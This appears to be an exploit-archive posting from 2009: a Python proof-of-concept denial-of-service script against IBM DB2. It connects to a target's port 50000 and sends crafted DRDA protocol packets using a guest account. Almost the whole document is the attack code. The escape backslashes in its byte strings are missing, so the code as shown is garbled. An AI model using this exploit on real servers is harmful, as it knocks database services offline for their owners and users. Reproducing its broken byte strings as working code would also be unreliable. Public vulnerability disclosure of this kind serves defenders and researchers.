ibmdb2-dos.txt
Posted on 02 April 2009
# Discovered by Dennis Yurichev <dennis@conus.info> # DB2TEST database should be present on target system # GUEST account with QQ password shoule be present on target system from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM) sockobj.connect ((argv[1], 50000)) sockobj.send( "x00xBExD0x41x00x01x00xB8x10x41x00x7Fx11x5Ex97xA8" "xA3x88x96x95x4Bx85xA7x85x40x40x40x40x40x40x40x40" "x40x40xF0xF1xC2xF4xF0xF3xC2xF8xF0xF0xF0x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x60xF0xF0" "xF0xF1xD5xC1xD4xC5x40x40x40x40x40x40x40x40x40x40" "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40" "xC4xC2xF2xE3xC5xE2xE3x40xF0xC4xC2xF2x40x40x40x40" "x40x40x40x40x40x40x40x40x40x00x18x14x04x14x03x00" "x07x24x07x00x09x14x74x00x05x24x0Fx00x08x14x40x00" "x08x00x0Bx11x47xD8xC4xC2xF2x61xD5xE3x00x06x11x6D" "xE7xD7x00x0Cx11x5AxE2xD8xD3xF0xF9xF0xF5xF0x00x4A" "xD0x01x00x02x00x44x10x6Dx00x06x11xA2x00x09x00x16" "x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40" "x40x40x40x40x00x24x11xDCx71x71x99xA7xDFxD5x8Fx18" "x45x96xD6x07x08x8DxDCx60x4FxFAxE6x37x4Dx6Ax62xAB" "x0CxE1x00xABxA3xD5x32x3E" ) data=sockobj.recv(102400) sockobj.send( "x00x26xD0x41x00x01x00x20x10x6Dx00x06x11xA2x00x03" "x00x16x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40" "x40x40x40x40x40x40x00x35xD0x41x00x02x00x2Fx10x6E" "x00x06x11xA2x00x03x00x16x21x10xC4xC2xF2xE3xC5xE2" "xE3x40x40x40x40x40x40x40x40x40x40x40x00x06x11xA1" "x98x98x00x09x11xA0x87xA4x85xA2xA3x00xBFxD0x01x00" "x03x00xB9x20x01x00x06x21x0Fx24x07x00x23x21x35xF1" "xF9xF2x4BxF1xF6xF8x4BxF0x4BxF1xF0xF8x4BxF3xF5xF3" "xF3xF3x4BxF0xF8xF1xF0xF2xF3xF1xF6xF0xF8xF1x00x16" "x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40" "x40x40x40x40x00x0Cx11x2ExE2xD8xD3xF0xF9xF0xF5xF0" "x00x0Dx00x2FxD8xE3xC4xE2xD8xD3xE7xF8xF6x00x1Cx00" "x35x00x06x11x9Cx04xE4x00x06x11x9Dx04xB0x00x06x11" "x9Ex04xE4x00x06x19x13x04xB8x00x3Cx21x04x37xE2xD8" "xD3xF0xF9xF0xF5xF0xD5xE3x40x40x40x40x40x40x40x40" "x40x40x40x40x40x40x40x40x97xA8xA3x88x96x95x4Bx85" "xA7x85x40x40x40x40x40x40x40x40x40x40x87xA4x85xA2" "xA3x40x40x40x00x00x05x21x3BxF1" ) data=sockobj.recv(102400) sockobj.send( "x00x12xD0x41x00x01x00x0Cx10x41x00x08x14x04x14xCC" "x04xE4x00x4ExD0x51x00x02x00x48x20x14x00x44x21x13" "x44x42x32x54x45x53x54x20x20x20x20x20x20x20x20x20" "x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20x20x20x20" "x20x20x20x20x53x59x53x53x48x32x30x30x20x20x20x20" "x20x20x20x20x20x20x01x01x01x01x01x01x01x01x00x01" "x00x35xD0x74x00x02x00x2Fx24x14x00x00x00x00x25x53" "x45x54x20x43x55x52x52x45x4Ex54x20x4Cx4Fx43x41x4C" "x45x20x4Cx43x5Fx43x54x59x50x45x20x3Dx20x27x65x6E" "x5Fx55x53x27xFFx00x53xD0x51x00x03x00x4Dx20x0Dx00" "x44x21x13x44x42x32x54x45x53x54x20x20x20x20x20x20" "x20x20x20x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20" "x20x20x20x20x20x20x20x53x59x53x53x48x32x30x30x20" "x20x20x20x20x20x20x20x20x20x53x59x53x4Cx56x4Cx30" "x31x00x04x00x05x21x16xF1x00x1AxD0x53x00x03x00x14" "x24x50x00x00x00x00x0Ax57x49x54x48x20x48x4Fx4Cx44" "x20xFFx00x41xD0x43x00x03x00x3Bx24x14x00x00x00x00" "x31x73x65x6Cx65x63x74x20x2Ax20x46x52x4Fx4Dx20x54" "x41x42x4Cx45x20x28x73x79x73x70x72x6Fx63x2Ex65x6E" "x76x5Fx67x65x74x5Fx69x6Ex73x74x5Fx69x6Ex66x6Fx28" "x29x29xFFx00x66xD0x01x00x04x00x60x20x0Cx00x44x21" "x13x44x42x32x54x45x53x54x20x20x20x20x20x20x20x20" "x20x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20x20x20" "x20x20x20x20x20x53x59x53x53x48x32x30x30x20x20x20" "x20x20x20x20x20x20x20x53x59x53x4Cx56x4Cx30x31x00" "x04x00x08x21x14x00x00x7FxFFx00x06x21x41xFFxFFx00" "x05x21x5Dx01x00x05x21x4BxF1" ) sockobj.close()
